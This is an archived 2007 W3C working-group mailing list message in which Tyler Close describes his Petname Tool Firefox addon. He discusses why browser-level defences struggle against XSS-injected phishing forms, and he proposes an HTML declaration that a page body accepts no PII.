- From: Close, Tyler J. <tyler.close@hp.com>
- Date: Thu, 29 Mar 2007 22:56:07 -0000
- To: <public-wsc-wg@w3.org>
Hi Shawn, Shawn Duffy wrote: > I'd be interested in hearing more about this... Do you have > any URLs I could check out for some more background info? I've implemented the Petname Tool part of the proposal as a Firefox addon. You can find it at: https://addons.mozilla.org/en-US/firefox/addon/957 The only documentation I have for the rest of the proposal are the emails I've sent to this list. Hopefully we'll be spending a lot more time documenting this concept though. ;) > I don't want to get too mired in the technical description > but... I can see how this might foil a phishing "site", per > se, but would it also be able to foil instances where a > phishing form is injected via XSS into a trusted site? Not as described in the email I sent. I think XSS attacks are problematic to solve in the web user agent. The problem is that the user agent really has no way of knowing whether or not a FORM was generated by the host on purpose, or by accident. There are both legitimate and nefarious reasons for changing the target of a FORM post. I think there are some things that could be done at the HTML level to make page authors less vulnerable to XSS when quoting content received from others, but that's not in scope for this WG. For example, it would be nice to be able to declare in the <HEAD> of an HTML document that the <BODY> will not accept any PII identifiers. The browser could then notice the contradiction if, through an XSS attack, a login FORM is presented. Hopefully the new HTML WG will take on this topic. Given the constraints of this WG's charter, I suspect we're only in position to do something about imposter web sites, rather than hacked web sites. That said, just doing something positive about imposter web sites is a big step forward. Tyler
Received on Thursday, 29 March 2007 22:56:59 UTC